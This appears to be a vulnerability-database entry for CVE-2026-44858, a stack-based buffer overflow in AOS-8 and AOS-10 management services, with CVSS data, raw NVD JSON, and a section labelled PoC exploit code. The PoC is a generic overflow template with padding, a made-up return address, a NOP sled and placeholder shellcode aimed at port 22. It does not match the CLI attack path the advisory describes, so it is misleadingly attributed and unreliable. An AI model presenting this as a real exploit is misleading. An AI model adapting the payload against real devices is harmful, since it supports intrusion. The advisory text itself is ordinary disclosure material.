Security Vulnerability Report
中文
CVE-2026-44858 CVSS 7.2 HIGH

CVE-2026-44858

Published: 2026-05-12 20:16:44
Last Modified: 2026-05-12 20:16:44

Description

Stack-based buffer overflow vulnerabilities exist in several underlying management service components accessed through the command-line interface of the AOS-8 and AOS-10 Operating Systems. An authenticated attacker with administrative privileges could exploit these vulnerabilities by sending specially crafted requests to the affected services. Successful exploitation could allow the attacker to execute arbitrary code with elevated privileges on the underlying operating system.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

AOS-8
AOS-10

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import sys # Target IP and Port configuration TARGET_IP = "192.168.1.1" TARGET_PORT = 22 # Example management port # Constructing the malicious payload # Offset to overwrite the return address offset = 1024 # Return address to bypass control flow (example) ret_addr = b"\xaf\x11\x40\x00" nop_sled = b"\x90" * 32 # Example shellcode (e.g., reverse TCP) shellcode = b"\xcc" * 100 payload = b"A" * offset + ret_addr + nop_sled + shellcode try: print(f"[*] Attempting to connect to {TARGET_IP}:{TARGET_PORT}...") # s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # s.connect((TARGET_IP, TARGET_PORT)) # s.send(payload) # s.close() print("[*] Payload sent. Check for crash or shell.") except Exception as e: print(f"[-] Exploit failed: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44858", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:44.417", "lastModified": "2026-05-12T20:16:44.417", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Stack-based buffer overflow vulnerabilities exist in several underlying management service components accessed through the command-line interface of the AOS-8 and AOS-10 Operating Systems. An authenticated attacker with administrative privileges could exploit these vulnerabilities by sending specially crafted requests to the affected services. Successful exploitation could allow the attacker to execute arbitrary code with elevated privileges on the underlying operating system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "references": [{"url": "https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw05048en_us&docLocale=en_US", "source": "[email protected]"}]}}